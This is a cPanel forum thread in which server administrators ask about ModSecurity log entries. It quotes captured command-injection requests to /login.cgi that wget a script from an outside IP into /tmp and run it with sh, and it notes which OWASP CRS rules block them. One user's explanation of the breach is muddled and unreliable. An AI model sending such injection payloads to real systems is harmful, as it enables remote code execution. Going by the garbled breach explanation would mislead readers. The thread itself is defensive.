SOLVED Entry in Mod Security Log question

webstuff

Well-Known Member
Jul 19, 2011
76
2
58
We recently found some scripts that look pretty nasty.. Any body have any idea what this person was trying to do?

GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

thanks
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,910
2,213
363
Hello,

The previous post includes an accurate description of what it looks attack was attempting to do. Let us know if you have additional questions.

Thank you.
 

webstuff

Well-Known Member
Jul 19, 2011
76
2
58
There was a security issue with a php file and tmp files were being deleted..

I'm not sure if this helps any..

Uptime: 123 seconds
Executable:
/usr/bin/php
Command Line (often faked in exploits):
/usr/bin/php
Network connections by the process (if any):
tcp: 127.0.0.1:33596 -> 127.0.0.1:3306
tcp: 127.0.0.1:33598 -> 127.0.0.1:3306
Files open by the process (if any):

/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/tmp/.ZendSem.gYLBCK (deleted)
/tmp/ZCUDi4colR (deleted)


I have more of the log too. Any other ideas or suggestions on where to look ? I see they are trying to connect... They tried to connect 30 times today too.
 

webstuff

Well-Known Member
Jul 19, 2011
76
2
58
Hello,

Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists?

Thank you.

Yes I did remove the php hole or at least I believe I did. So far I haven't seen any funky stuff but I have seen this. The only other question I have with this is.. Do you think there is any chance they could have gotten my mysql database login? In other words. When you see this sort of log I assume you wouldn't need the mysql password username correct? Or is there a possibilty. Also I can provide whatever else if you would like too. I do have some of the orgrinal files for some items. (The entire website was a complete mess. I had contacted my hosting provider talked to the security team and they kept telling me I had nothing to worry about but I just didn't buy that so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts other alerts etc..) But I do see connections like that in my mod security. Just want to be 110% sure I am not missing anything. Also I did happen to find some advance malware link I believe to where it installs a virus in the firm I believe. And if I understand everything correctly its one of those where if you wipe the drive complete format it still stays on the system. Plus there were open folders public keys etc.. I do not believe anything got changed but then again from my newbie side of details I always could be missing something. There is other stuff that isn't going on which gives me the reason to believe I got it too. I will gladly pm any details too.

Thank you again so much for the help.

Thank you again.
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,910
2,213
363
Hello @webstuff,

It's difficult to know for sure the extent at which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at:

System Administration Services | cPanel Forums

Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at:

Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation

Thank you.
 

webstuff

Well-Known Member
Jul 19, 2011
76
2
58
Yes I removed the files. In mod security its showing they where trying to connect to 127.0.0.1 Can anyone point me in the right direction on this? Its showing blocked each time.. Or any thoughts at all?
 

webstuff

Well-Known Member
Jul 19, 2011
76
2
58
ok just saw that I looked into that. haha actually some top people were hired and they said they saw nothing and it was nothing to worry about. They though it was email or some other files which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
 

webstuff

Well-Known Member
Jul 19, 2011
76
2
58
Just so everyone knows after digging around. I found out that there was a php script that was compromised. Turns out that the one version of php when you get it to crash correctly with the mysql it would then show the login for mysql so then hacker used the cross scripting X-fra,e options X content http strict transport etc... So they would make there script http://localhost/whatever on there machine then cross into the website with a action of post get etc.. Then they would select or inject mysql and grab sessions or hijack them that way.. Anyways after doing so much searching myself lots of lost hours me annoying web hosting companys and really no help this is what I came across.

It was sort of upsetting because I contacted the web hosting companies security companies etc and noooooo help ... They just kept telling me its normal for that to run. And I would always say this sort of load shouldn't be going on.. Anyways after hours and hours easily 100 something reading spending with firms I finally found out it was this. Not mention the website has easilly over a million files which only makes it more difficult. But I hope this information will help others.

Mark it closed.... As for everyone else thanking for helping and pointing me in the right direction you know who you are.
 
  • Like
Reactions: cPanelMichael

TheGrumpyOne

Registered
Mar 9, 2017
2
0
1
United States
cPanel Access Level
Root Administrator
Hello,
I am finding this string in my log file.

"GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$

I've been getting these the last 3 weeks. Has anyone come up with a way to block this?
I have OWASP, but I'm a noob when it comes to writing rules and don't want to screw things up.
Thanks in advance for the Help!
 

fuzzylogic

Well-Known Member
Nov 8, 2014
149
89
78
cPanel Access Level
Root Administrator
You should not need to write rules for requests like these.
I would expect the OWASP CRS to block requests like this if it is set up properly and working.

In my test using cPanel provided rules
OWASP ModSecurity Core Rule Set V3.0
SpiderLabs OWASP curated ModSecurity rule set

This request triggered the remote command injection rule ids 932105 and 932115 scoring 5 anomaly points each.

The 10 anomaly points triggered blocking rule id 949110
Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score.

The 10 anomaly points triggered logging rule id 980130
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score.
[msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0)
Remote Command Execution: Windows Command Injection"]
 
  • Like
Reactions: cPanelMichael